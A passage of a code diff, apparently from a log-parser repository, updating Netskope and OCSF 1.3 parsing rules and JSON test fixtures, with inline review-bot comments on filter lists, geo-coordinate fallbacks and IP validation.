48.8323, + "lon": 2.4075 + }, + "postal_code": "75018", + "region_name": "\u00cele-de-France", + "timezone": "Europe/Paris" + }, + "ip": "5.6.7.8" + }, + "url": { + "original": "test.example.com", + "path": "test.example.com" + }, + "user": { + "domain": "mail.fr", + "email": "john.doe@mail.fr", + "name": "john.doe" + }, + "user_agent": { + "name": "Chrome" + } + } +} \ No newline at end of file diff --git a/Netskope/netskope_events/tests/test_nspolicy_log.json b/Netskope/netskope_events/tests/test_nspolicy_log.json index 25513a172..412ece514 100644 --- a/Netskope/netskope_events/tests/test_nspolicy_log.json +++ b/Netskope/netskope_events/tests/test_nspolicy_log.json @@ -17,6 +17,9 @@ ] }, "@timestamp": "2022-12-21T15:52:00Z", + "action": { + "name": "Allow" + }, "cloud": { "instance": { "id": "Example" @@ -43,7 +46,8 @@ "md5": "68b329da9893e34099c7d8ad5cb9c940" }, "mime_type": "image/gif", - "name": "giphy2.gif" + "name": "giphy2.gif", + "size": 204299 }, "host": { "name": "TEST-1111111", diff --git a/Netskope/netskope_events/tests/test_nspolicy_upload.json b/Netskope/netskope_events/tests/test_nspolicy_upload.json new file mode 100644 index 000000000..314e7d7e1 --- /dev/null +++ b/Netskope/netskope_events/tests/test_nspolicy_upload.json 
@@ -0,0 +1,123 @@ +{ + "input": { + "message": "{\"_id\":\"2d7a3c19cf913179146454b6\",\"access_method\":\"Client\",\"activity\":\"Upload\",\"alert\":\"no\",\"app\":\"App\",\"app_session_id\":1234567890,\"appcategory\":\"Remote Access\",\"browser\":\"CHROME\",\"browser_session_id\":1111111111111111111,\"browser_version\":\"6.0;\",\"category\":\"Remote Access\",\"cci\":73,\"ccl\":\"medium\",\"connection_id\":0,\"count\":1,\"data_type\":\"application/octet-stream\",\"device\":\"Windows Device\",\"device_classification\":\"managed\",\"dst_country\":\"CZ\",\"dst_latitude\":50.0883,\"dst_location\":\"Prague\",\"dst_longitude\":14.4124,\"dst_region\":\"Prague\",\"dst_timezone\":\"Europe/Prague\",\"dst_zipcode\":\"110 00\",\"dstip\":\"1.2.3.4\",\"dstport\":80,\"file_size\":24,\"file_type\":\"File Type Not Detected\",\"hostname\":\"PC-HOST01\",\"ja3\":\"NotAvailable\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"md5\":\"68b329da9893e34099c7d8ad5cb9c940\",\"netskope_pop\":\"FR-PAR3\",\"object\":\"object.txt\",\"object_type\":\"File\",\"organization_unit\":\"\",\"os\":\"Windows 10\",\"os_version\":\"Windows NT 10.0\",\"other_categories\":[\"Remote Access\"],\"page\":\"test.example.com\",\"page_site\":\"app\",\"policy_id\":\"22222222222222222222222222222222 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":4444444444444444444,\"severity\":\"unknown\",\"site\":\"App\",\"src_country\":\"FR\",\"src_latitude\":48.6673,\"src_location\":\"Paris\",\"src_longitude\":2.3476,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:04:00 2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75001\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731575086,\"traffic_type\":\"CloudApp\",\"transaction_id\":5555555555555555555,\"type\":\"nspolicy\",\"universal_connector\":\"yes\",\"ur_normalized\":\"jdoe@mail.com\",\"url\":\"url.app.com/object2.txt\",\"user\":\"JDOE@mail.com\",\"useragent\":\"Mozilla/4.0 (compatible; CHROME 6.0; 
DynGate)\",\"userip\":\"10.20.30.40\",\"userkey\":\"JDOE@mail.com\",\"serial\":\"\",\"numbytes\":0,\"exposure\":\"\",\"server_bytes\":0,\"web_universal_connector\":\"\",\"logintype\":\"\",\"alert_type\":\"\",\"from_user\":\"\",\"dlp_scan_failed\":\"\",\"dlp_rule\":\"\",\"fromlogs\":\"\",\"justification_type\":\"\",\"tss_mode\":\"\",\"user_category\":\"\",\"src_geoip_src\":0,\"CononicalName\":\"\",\"shared_with\":\"\",\"channel_id\":\"\",\"dlp_mail_parent_id\":\"\",\"custom_attr\":{},\"sha256\":\"\",\"resp_cnt\":0,\"custom_connector\":\"\",\"orignal_file_path\":\"\",\"to_user\":\"\",\"internal_collaborator_count\":0,\"owner\":\"\",\"appsuite\":\"\",\"org\":\"\",\"dsthost\":\"\",\"tss_fail_reason\":\"\",\"audit_type\":\"\",\"parent_id\":\"\",\"data_center\":\"\",\"loginurl\":\"\",\"mime_type\":\"\",\"from_user_category\":\"\",\"file_path\":\"\",\"modified\":0,\"referer\":\"\",\"dlp_profile\":\"\",\"object_id\":\"\",\"true_obj_type\":\"\",\"tss_scan_failed\":\"\",\"managementID\":\"\",\"dst_geoip_src\":0,\"dlp_rule_severity\":\"\",\"conn_duration\":0,\"policy\":\"\",\"netskope_activity\":\"\",\"audit_category\":\"\",\"smtp_to\":[],\"nsdeviceuid\":\"\",\"justification_reason\":\"\",\"suppression_start_time\":0,\"dlp_is_unique_count\":\"\",\"dlp_parent_id\":0,\"dlp_fail_reason\":\"\",\"userPrincipalName\":\"\",\"dlp_file\":\"\",\"dlp_incident_id\":0,\"sanctioned_instance\":\"\",\"suppression_key\":\"\",\"retro_scan_name\":\"\",\"instance_id\":\"\",\"true_obj_category\":\"\",\"action\":\"\",\"sessionid\":\"\",\"file_lang\":\"\",\"log_file_name\":\"\",\"notify_template\":\"\",\"sAMAccountName\":\"\",\"ext_labels\":[],\"instance\":\"\",\"user_id\":\"\",\"workspace\":\"\",\"dlp_rule_count\":0,\"app_activity\":\"\",\"suppression_end_time\":0,\"title\":\"\",\"scan_type\":\"\",\"dlp_unique_count\":0,\"total_collaborator_count\":0,\"client_bytes\":0,\"req_cnt\":0,\"user_confidence_index\":0,\"workspace_id\":\"\"}", + "sekoiaio": { + "intake": { + "dialect": "Netskope", + 
"dialect_uuid": "de9ca004-991e-4f5c-89c5-e075f3fb3216" + } + } + }, + "expected": { + "message": "{\"_id\":\"2d7a3c19cf913179146454b6\",\"access_method\":\"Client\",\"activity\":\"Upload\",\"alert\":\"no\",\"app\":\"App\",\"app_session_id\":1234567890,\"appcategory\":\"Remote Access\",\"browser\":\"CHROME\",\"browser_session_id\":1111111111111111111,\"browser_version\":\"6.0;\",\"category\":\"Remote Access\",\"cci\":73,\"ccl\":\"medium\",\"connection_id\":0,\"count\":1,\"data_type\":\"application/octet-stream\",\"device\":\"Windows Device\",\"device_classification\":\"managed\",\"dst_country\":\"CZ\",\"dst_latitude\":50.0883,\"dst_location\":\"Prague\",\"dst_longitude\":14.4124,\"dst_region\":\"Prague\",\"dst_timezone\":\"Europe/Prague\",\"dst_zipcode\":\"110 00\",\"dstip\":\"1.2.3.4\",\"dstport\":80,\"file_size\":24,\"file_type\":\"File Type Not Detected\",\"hostname\":\"PC-HOST01\",\"ja3\":\"NotAvailable\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"md5\":\"68b329da9893e34099c7d8ad5cb9c940\",\"netskope_pop\":\"FR-PAR3\",\"object\":\"object.txt\",\"object_type\":\"File\",\"organization_unit\":\"\",\"os\":\"Windows 10\",\"os_version\":\"Windows NT 10.0\",\"other_categories\":[\"Remote Access\"],\"page\":\"test.example.com\",\"page_site\":\"app\",\"policy_id\":\"22222222222222222222222222222222 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":4444444444444444444,\"severity\":\"unknown\",\"site\":\"App\",\"src_country\":\"FR\",\"src_latitude\":48.6673,\"src_location\":\"Paris\",\"src_longitude\":2.3476,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:04:00 
2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75001\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731575086,\"traffic_type\":\"CloudApp\",\"transaction_id\":5555555555555555555,\"type\":\"nspolicy\",\"universal_connector\":\"yes\",\"ur_normalized\":\"jdoe@mail.com\",\"url\":\"url.app.com/object2.txt\",\"user\":\"JDOE@mail.com\",\"useragent\":\"Mozilla/4.0 (compatible; CHROME 6.0; DynGate)\",\"userip\":\"10.20.30.40\",\"userkey\":\"JDOE@mail.com\",\"serial\":\"\",\"numbytes\":0,\"exposure\":\"\",\"server_bytes\":0,\"web_universal_connector\":\"\",\"logintype\":\"\",\"alert_type\":\"\",\"from_user\":\"\",\"dlp_scan_failed\":\"\",\"dlp_rule\":\"\",\"fromlogs\":\"\",\"justification_type\":\"\",\"tss_mode\":\"\",\"user_category\":\"\",\"src_geoip_src\":0,\"CononicalName\":\"\",\"shared_with\":\"\",\"channel_id\":\"\",\"dlp_mail_parent_id\":\"\",\"custom_attr\":{},\"sha256\":\"\",\"resp_cnt\":0,\"custom_connector\":\"\",\"orignal_file_path\":\"\",\"to_user\":\"\",\"internal_collaborator_count\":0,\"owner\":\"\",\"appsuite\":\"\",\"org\":\"\",\"dsthost\":\"\",\"tss_fail_reason\":\"\",\"audit_type\":\"\",\"parent_id\":\"\",\"data_center\":\"\",\"loginurl\":\"\",\"mime_type\":\"\",\"from_user_category\":\"\",\"file_path\":\"\",\"modified\":0,\"referer\":\"\",\"dlp_profile\":\"\",\"object_id\":\"\",\"true_obj_type\":\"\",\"tss_scan_failed\":\"\",\"managementID\":\"\",\"dst_geoip_src\":0,\"dlp_rule_severity\":\"\",\"conn_duration\":0,\"policy\":\"\",\"netskope_activity\":\"\",\"audit_category\":\"\",\"smtp_to\":[],\"nsdeviceuid\":\"\",\"justification_reason\":\"\",\"suppression_start_time\":0,\"dlp_is_unique_count\":\"\",\"dlp_parent_id\":0,\"dlp_fail_reason\":\"\",\"userPrincipalName\":\"\",\"dlp_file\":\"\",\"dlp_incident_id\":0,\"sanctioned_instance\":\"\",\"suppression_key\":\"\",\"retro_scan_name\":\"\",\"instance_id\":\"\",\"true_obj_category\":\"\",\"action\":\"\",\"sessionid\":\"\",\"file_lang\":\"\",\"log_file_name\":\"\",\"notify_template
\":\"\",\"sAMAccountName\":\"\",\"ext_labels\":[],\"instance\":\"\",\"user_id\":\"\",\"workspace\":\"\",\"dlp_rule_count\":0,\"app_activity\":\"\",\"suppression_end_time\":0,\"title\":\"\",\"scan_type\":\"\",\"dlp_unique_count\":0,\"total_collaborator_count\":0,\"client_bytes\":0,\"req_cnt\":0,\"user_confidence_index\":0,\"workspace_id\":\"\"}", + "event": { + "action": "Upload", + "category": [ + "network" + ], + "dataset": "nspolicy", + "duration": 0, + "kind": "event", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-14T09:04:46Z", + "action": { + "name": "Allow" + }, + "destination": { + "address": "1.2.3.4", + "bytes": 0, + "geo": { + "city_name": "Prague", + "country_iso_code": "CZ", + "location": { + "lat": 50.0883, + "lon": 14.4124 + }, + "postal_code": "110 00", + "region_name": "Prague", + "timezone": "Europe/Prague" + }, + "ip": "1.2.3.4" + }, + "file": { + "hash": { + "md5": "68b329da9893e34099c7d8ad5cb9c940" + }, + "mime_type": "File Type Not Detected", + "name": "object.txt", + "size": 24 + }, + "host": { + "name": "PC-HOST01", + "os": { + "name": "Windows 10", + "platform": "windows", + "type": "windows", + "version": "Windows NT 10.0" + } + }, + "netskope": { + "events": { + "access_method": "Client", + "application": { + "category": "Remote Access", + "name": "App" + }, + "ccl": "medium" + } + }, + "network": { + "bytes": 0 + }, + "observer": { + "vendor": "Netskope" + }, + "related": { + "hash": [ + "68b329da9893e34099c7d8ad5cb9c940" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "JDOE" + ] + }, + "rule": { + "id": "22222222222222222222222222222222 2024-10-30 13:52:18.401518" + }, + "source": { + "address": "5.6.7.8", + "bytes": 0, + "geo": { + "city_name": "Paris", + "country_iso_code": "FR", + "location": { + "lat": 48.6673, + "lon": 2.3476 + }, + "postal_code": "75001", + "region_name": "\u00cele-de-France", + "timezone": "Europe/Paris" + }, + "ip": "5.6.7.8" + }, + "url": { + "original": "url.app.com/object2.txt", + "path": 
"url.app.com/object2.txt" + }, + "user": { + "domain": "mail.com", + "email": "JDOE@mail.com", + "name": "JDOE" + }, + "user_agent": { + "name": "CHROME", + "version": "6.0;" + } + } +} \ No newline at end of file diff --git a/Netskope/netskope_events/tests/test_user_alert.json b/Netskope/netskope_events/tests/test_user_alert.json index a882c2ac5..bb5831a9c 100644 --- a/Netskope/netskope_events/tests/test_user_alert.json +++ b/Netskope/netskope_events/tests/test_user_alert.json @@ -17,6 +17,9 @@ ] }, "@timestamp": "2022-12-21T14:52:01Z", + "action": { + "name": "useralert" + }, "destination": { "address": "108.128.91.183", "bytes": 0, diff --git a/OCSF/ocsf/_meta/manifest.yml b/OCSF/ocsf/_meta/manifest.yml index 33f57ccd3..94a2c41b4 100644 --- a/OCSF/ocsf/_meta/manifest.yml +++ b/OCSF/ocsf/_meta/manifest.yml @@ -6,7 +6,7 @@ slug: ocsf description: >- The Open Cybersecurity Schema Framework is an open-source project, delivering an extensible framework for developing schemas, along with a vendor-agnostic core security schema. - Supported version: **1.1** + Supported version: **1.3** data_sources: File monitoring: OCSF allows collecting system activities diff --git a/OCSF/ocsf/_meta/smart-descriptions.json b/OCSF/ocsf/_meta/smart-descriptions.json index d03bc41fb..6947b5762 100644 --- a/OCSF/ocsf/_meta/smart-descriptions.json +++ b/OCSF/ocsf/_meta/smart-descriptions.json 
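Review bot: The new fixture's expected output sets `file.mime_type` to `"File Type Not Detected"`, which is the input's `file_type` label, while the input's `data_type` field carries the actual MIME type `application/octet-stream`; the mapping lives in the parser outside this diff, so I can only flag that the fixture enshrines it — if ECS `file.mime_type` is the intent, `data_type` looks like the right source and the `file_type` label would belong under `netskope.events`. The same fixture maps `url.path` to the full `url.app.com/object2.txt` value, identical to `url.original` (test_nspolicy_block.json shows the same for `test.example.com`), which suggests the host is not being stripped from the path for scheme-less URLs — again a parser question rather than a fixture one. Both new fixtures (this one and test_nspolicy_block.json) end with `\ No newline at end of file`; adding the trailing newline keeps future diffs clean.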
@@ -928,5 +928,49 @@
 "field": "ocsf.activity_name"
 }
 ]
+ },
+ {
+ "value": "File Remediation Activity: {ocsf.activity_name} file {file.name}",
+ "conditions": [
+ {
+ "field": "ocsf.class_uid",
+ "value": 7002
+ },
+ {
+ "field": "ocsf.activity_name"
+ },
+ {
+ "field": "file.name"
+ }
+ ]
+ },
+ {
+ "value": "Process Remediation Activity: {ocsf.activity_name} file {file.name} by process {process.name}",
+ "conditions": [
+ {
+ "field": "ocsf.class_uid",
+ "value": 7003
+ },
+ {
+ "field": "ocsf.activity_name"
+ },
+ {
+ "field": "file.name"
+ },
+ {
+ "field": "process.name"
+ }
+ ]
+ },
+ {
+ "value": "{ocsf.class_name}: {ocsf.activity_name}",
+ "conditions": [
+ {
+ "field": "ocsf.class_name"
+ },
+ {
+ "field": "ocsf.activity_name"
+ }
+ ]
+ }
 ]
diff --git a/OCSF/ocsf/ingest/parser.yml b/OCSF/ocsf/ingest/parser.yml
index 765a6a76d..3f88ce24c 100644
--- a/OCSF/ocsf/ingest/parser.yml
+++ b/OCSF/ocsf/ingest/parser.yml
@@ -79,16 +79,16 @@ pipeline: - name: set_common_fields - name: pipeline_object_actor - filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,2002,2003,2004,2006,3001,3002,3003,3004,3005,3006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,5001,5002,5003,5006,5007,5008,5009,5010,5011,5012,5013,5014,5015,5016,5017,5018,5019,6001,6002,6003,6004,6005,6006,6007,201001,201002,201003,205004,205005,205019,99901006,99903001,99904001,99904002,99904009,99904010,99936001,99936002,99937002] and parse_event.message.get('actor') != None }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,2002,2003,2004,2006,3001,3002,3003,3004,3005,3006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,5001,5002,5003,5006,5007,5008,5009,5010,5011,5012,5013,5014,5015,5016,5017,5018,5019,5020,6001,6002,6003,6004,6005,6006,6007,201001,201002,201003,201004,205004,205005,205019,99901006,99903001,99904001,99904002,99904009,99904010,99936001,99936002,99937002] and parse_event.message.get('actor') != None }}" - name: pipeline_object_attack - filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,2001,2004,2005,2006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,6001,6005,201001,201002,201003,99901006,99902003,99904001,99904002,99904009,99904010] and parse_event.message.get('attacks') != None }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1009,1010,2001,2004,2005,2006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,6001,6005,201001,201002,201003,99901006,99902003,99904001,99904002,99904009,99904010] and parse_event.message.get('attacks') != None }}" - name: 
pipeline_object_network_connection_info - filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [4001,4002,4003,4004,4005,4006,4007,4008,4010,4013,4014,5012,6006,99904009,99904010,99931006,99932007,99933005] and parse_event.message.get('connection_info') != None }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [4001,4002,4003,4004,4005,4006,4007,4008,4010,4013,4014,5012,6006,7004,99904009,99904010,99931006,99932007,99933005] and parse_event.message.get('connection_info') != None }}" - name: pipeline_object_device - filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,2002,2003,2004,2006,3001,3002,3003,3004,3005,3006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,5001,5002,5004,5006,5007,5008,5009,5010,5011,5012,5013,5014,5015,5016,5017,5018,5019,6001,6002,6004,6007,201001,201002,201003,205004,205005,205019,99901006,99903001,99904001,99904002,99904009,99904010,99936001,99936002] and parse_event.message.get('device') != None }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,2002,2003,2004,2006,3001,3002,3003,3004,3005,3006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,5001,5002,5004,5006,5007,5008,5009,5010,5011,5012,5013,5014,5015,5016,5017,5018,5019,5020,6001,6002,6004,6007,201001,201002,201003,201004,205004,205005,205019,99901006,99903001,99904001,99904002,99904009,99904010,99936001,99936002] and parse_event.message.get('device') != None }}" - name: pipeline_object_http_request filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [3001,3002,3003,3004,3005,3006,4002,6001,6003,6004,6005,99937002,99938001] and parse_event.message.get('http_request') != None }}" 
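Review bot: The new `pipeline_object_attack` filter drops class_uid `1008` from its list while every other list in this hunk only gains ids (`5020`, `201004`, `7004`), so events of class 1008 that still carry an `attacks` object will silently stop producing the attack fields. If that is a deliberate alignment with the 1.3 schema it belongs in the commit message; if not, restore the sequence to `...,1007,1008,1009,1010,...` on the added line. Repeating these long id lists across filters is what lets such a drift go unnoticed, so consolidating them in one place would help future schema bumps, if the pipeline format allows it.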
@@ -100,7 +100,7 @@ pipeline: filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1008,2006,3001,3002,3003,3004,3005,3006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4013,4014,6001,6003,6004,6005,6006,99904009,99904010,99937002,99938001] and parse_event.message.get('dst_endpoint') != None or parse_event.message.get('src_endpoint') != None }}" - name: pipeline_object_process - filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1004,1007,2001,5011,5012,5015,99932006,99932007,99932011,99933006,99934001,99935002] and parse_event.message.get('process') != None }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1004,1007,2001,5011,5012,5015,7003,99932006,99932007,99932011,99933006,99934001,99935002] and parse_event.message.get('process') != None }}" - name: pipeline_object_proxy filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [3006,4001,4002,4003,4004,4005,4006,4007,4008,4010,4013,4014,6004,99904009,99904010] and parse_event.message.get('proxy') != None }}" 
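Review bot: The unchanged endpoint filter that opens this hunk ends with `... and parse_event.message.get('dst_endpoint') != None or parse_event.message.get('src_endpoint') != None }}`; since `and` binds tighter than `or`, any event with a `src_endpoint` enters that pipeline regardless of the class_uid gate the rest of the file relies on. As the commit is already editing the neighbouring filters, parenthesising the endpoint test fixes it in place: `... and (parse_event.message.get('dst_endpoint') != None or parse_event.message.get('src_endpoint') != None) }}`. The `- name:` entry that owns this filter starts before the hunk.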
@@ -115,7 +115,7 @@ pipeline: filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [3001,3002,3003,3005,3006,4014,5003,5018,99932017] and parse_event.message.get('user') != None }}" - name: pipeline_object_file - filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1008,2006,4002,4005,4006,4007,4008,4010,4011,5007,6006,99901006,99903001,99904001,99931004,99931007,99931010,99932001,99933000] and parse_event.message.get('file') != None }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1008,2006,4002,4005,4006,4007,4008,4010,4011,5007,6006,7002,99901006,99903001,99904001,99931004,99931007,99931010,99932001,99933000] and parse_event.message.get('file') != None }}" - name: pipeline_object_system_activity_helper filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1002,1005,1006,1007,5010,5011,99932004,99932006,99933002,99933004] }}" @@ -454,8 +454,8 @@ stages: host.geo.city_name: "{{ parse_event.message.device.location.city }}" host.geo.continent_name: "{{ parse_event.message.device.location.continent }}" host.geo.country_iso_code: "{{ parse_event.message.device.location.country }}" - host.geo.location.lon: "{{ parse_event.message.device.location.coordinates[0] }}" - host.geo.location.lat: "{{ parse_event.message.device.location.coordinates[1] }}" + host.geo.location.lon: "{{ parse_event.message.device.location.coordinates[0] or parse_event.message.device.location.long }}" + host.geo.location.lat: "{{ parse_event.message.device.location.coordinates[1] or parse_event.message.device.location.lat }}" host.geo.name: "{{ parse_event.message.device.location.desc }}" host.geo.postal_code: "{{ parse_event.message.device.location.postal_code }}" host.geo.region_iso_code: "{{ parse_event.message.device.location.region }}" 
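Review bot: In the `@@ -454` hunk the fallback `coordinates[0] or parse_event.message.device.location.long` still indexes `coordinates[0]` first, so for an event that carries only `lat`/`long` the outcome depends on how the engine treats an undefined `coordinates` under subscript, and a genuine longitude or latitude of `0` is falsy and would be replaced by the `long`/`lat` field instead of being kept. A presence test avoids both cases: `host.geo.location.lon: "{{ parse_event.message.device.location.coordinates[0] if parse_event.message.device.location.get('coordinates') else parse_event.message.device.location.get('long') }}"`, with the same shape for `lat`. The `@@ -534` (`source.geo`) and `@@ -557` (`destination.geo`) hunks on the next line use the identical pattern and would take the same change.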
@@ -534,7 +534,8 @@ stages: - set: source.geo.city_name: "{{ parse_event.message.src_endpoint.location.city }}" source.geo.continent_name: "{{ parse_event.message.src_endpoint.location.continent }}" - source.geo.location: "{{ parse_event.message.src_endpoint.location.coordinates }}" + source.geo.location.lon: "{{ parse_event.message.src_endpoint.location.coordinates[0] or parse_event.message.src_endpoint.location.long }}" + source.geo.location.lat: "{{ parse_event.message.src_endpoint.location.coordinates[1] or parse_event.message.src_endpoint.location.lat }}" source.geo.country_iso_code: "{{ parse_event.message.src_endpoint.location.country }}" source.geo.name: "{{ parse_event.message.src_endpoint.location.desc }}" source.geo.postal_code: "{{ parse_event.message.src_endpoint.location.postal_code }}" @@ -557,8 +558,8 @@ stages: - set: destination.geo.city_name: "{{ parse_event.message.dst_endpoint.location.city }}" destination.geo.continent_name: "{{ parse_event.message.dst_endpoint.location.continent }}" - destination.geo.location.lon: "{{ parse_event.message.dst_endpoint.location.coordinates[0] }}" - destination.geo.location.lat: "{{ parse_event.message.dst_endpoint.location.coordinates[1] }}" + destination.geo.location.lon: "{{ parse_event.message.dst_endpoint.location.coordinates[0] or parse_event.message.dst_endpoint.location.long }}" + destination.geo.location.lat: "{{ parse_event.message.dst_endpoint.location.coordinates[1] or parse_event.message.dst_endpoint.location.lat }}" destination.geo.country_iso_code: "{{ parse_event.message.dst_endpoint.location.country }}" destination.geo.name: "{{ parse_event.message.dst_endpoint.location.desc }}" destination.geo.postal_code: "{{ parse_event.message.dst_endpoint.location.postal_code }}" 
@@ -567,9 +568,11 @@ stages: destination.domain: "{{ parse_event.message.dst_endpoint.hostname }}" filter: "{{ parse_event.message.dst_endpoint.get('hostname') != None }}" - set: - destination.ip: "{{ parse_event.message.dst_endpoint.ip }}" destination.mac: "{{ parse_event.message.dst_endpoint.mac }}" destination.port: "{{ parse_event.message.dst_endpoint.port }}" + - set: + destination.ip: "{{ parse_event.message.dst_endpoint.ip }}" + filter: "{{ parse_event.message.dst_endpoint.ip | is_ipaddress }}" - set: network.application: "{{ parse_event.message.dst_endpoint.svc_name }}" filter: "{{ parse_event.message.dst_endpoint.get('svc_name') != None }}" diff --git a/OCSF/ocsf/tests/generated_file_remediation_activity_1.json b/OCSF/ocsf/tests/generated_file_remediation_activity_1.json new file mode 100644 index 000000000..29fe10f1c --- /dev/null +++ b/OCSF/ocsf/tests/generated_file_remediation_activity_1.json 
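Review bot: The `is_ipaddress` guard added for `destination.ip` has no visible counterpart for `source.ip`; the `src_endpoint.ip` assignment is outside this hunk and presumably still copies the raw value, so a hostname or empty string in `src_endpoint.ip` would land in an ECS ip field while the same value on the destination side is now dropped. Mirror the guard there, `filter: "{{ parse_event.message.src_endpoint.ip | is_ipaddress }}"`, and check that the `related.ip` collection only picks up the validated values. The `dst_endpoint` stage containing these `set` steps begins before the hunk.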
@@ -0,0 +1,39 @@ +{ + "input": { + "message": "{\"status\": \"Does Not Exist\", \"time\": 1731328594225, \"file\": {\"name\": \"html.pkg\", \"type\": \"Local Socket\", \"version\": \"1.3.0\", \"path\": \"canyon upgrading wool/marco.fla/html.pkg\", \"ext\": \"honest borough graduated\", \"type_id\": 5, \"mime_type\": \"pr/anything\", \"parent_folder\": \"canyon upgrading wool/marco.fla\", \"confidentiality\": \"prisoner fought submission\", \"hashes\": [{\"value\": \"BDD5C7FF933889BB4DE51943D295A2C3BF3CCE0EE5D7196DB36A7B734E44B9478FE798F4A6E72C0FB13B30746C0434F713614EBDB498B03029382CF837E23878\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}], \"xattributes\": {}}, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"older bangladesh caused\", \"version\": \"1.3.0\", \"lang\": \"en\", \"cpe_name\": \"m ryan proof\", \"url_string\": \"web\", \"vendor_name\": \"directed villas incorrect\"}, \"labels\": [\"range\", \"mild\"], \"profiles\": [], \"event_code\": \"ethnic\", \"log_name\": \"wisconsin scenes croatia\", \"log_provider\": \"consolidated month mil\", \"logged_time\": 1731328594209, \"loggers\": [{\"name\": \"generated dale subsection\", \"version\": \"1.3.0\", \"device\": {\"owner\": {\"name\": \"Chapter\", \"type\": \"User\", \"uid\": \"95fb04dc-a029-11ef-9566-0242ac110007\", \"type_id\": 1, \"risk_level\": \"Info\", \"risk_level_id\": 0}, \"type\": \"IOT\", \"os\": {\"name\": \"polls knew problem\", \"type\": \"Windows\", \"type_id\": 100, \"cpe_name\": \"architects letting hay\"}, \"desc\": \"tradition automated mysql\", \"hostname\": \"meters.edu\", \"uid\": \"95faf0a0-a029-11ef-a3c0-0242ac110007\", \"image\": {\"name\": \"ace tracy webshots\", \"path\": \"joined also europe\", \"uid\": \"95fbbb16-a029-11ef-9965-0242ac110007\"}, \"groups\": [{\"uid\": \"95faa5fa-a029-11ef-b64e-0242ac110007\"}], \"type_id\": 7, \"imei\": \"summary ieee rated\", \"interface_name\": \"marsh shopper guides\", \"interface_uid\": 
\"95fa9074-a029-11ef-931d-0242ac110007\", \"region\": \"accepting sword tab\", \"risk_level\": \"High\", \"risk_level_id\": 3, \"risk_score\": 4, \"zone\": \"ability footage nt\"}, \"product\": {\"name\": \"quote licence channel\", \"version\": \"1.3.0\", \"uid\": \"95fc351e-a029-11ef-87b2-0242ac110007\", \"feature\": {\"name\": \"adequate drainage dear\", \"version\": \"1.3.0\", \"uid\": \"95fc4cd4-a029-11ef-9a35-0242ac110007\"}, \"url_string\": \"makes\", \"vendor_name\": \"hybrid licensing faster\"}, \"uid\": \"95fc5602-a029-11ef-9902-0242ac110007\", \"log_name\": \"vegas cave greatly\", \"log_provider\": \"ieee cancer pharmaceuticals\", \"logged_time\": 1731328594222}, {\"name\": \"hostels given kill\", \"version\": \"1.3.0\", \"product\": {\"name\": \"css ks demonstrate\", \"version\": \"1.3.0\", \"uid\": \"95fc6b06-a029-11ef-b5a5-0242ac110007\", \"lang\": \"en\", \"url_string\": \"alternatives\", \"vendor_name\": \"television preventing blades\"}, \"uid\": \"95fc72c2-a029-11ef-994a-0242ac110007\", \"log_provider\": \"alignment free mines\", \"logged_time\": 1731328594222}], \"original_time\": \"drill blogs lemon\", \"processed_time\": 1731328594222, \"tenant_uid\": \"95fc7d12-a029-11ef-bfaa-0242ac110007\"}, \"severity\": \"illustrations\", \"duration\": 559843632, \"category_uid\": 7, \"activity_id\": 2, \"type_uid\": 700202, \"type_name\": \"File Remediation Activity: Evict\", \"observables\": [{\"name\": \"chen architects purchased\", \"type\": \"File\", \"type_id\": 24}, {\"name\": \"controlling sublime bp\", \"type\": \"URL String\", \"type_id\": 6}], \"category_name\": \"Remediation\", \"class_uid\": 7002, \"class_name\": \"File Remediation Activity\", \"timezone_offset\": 58, \"activity_name\": \"Evict\", \"command_uid\": 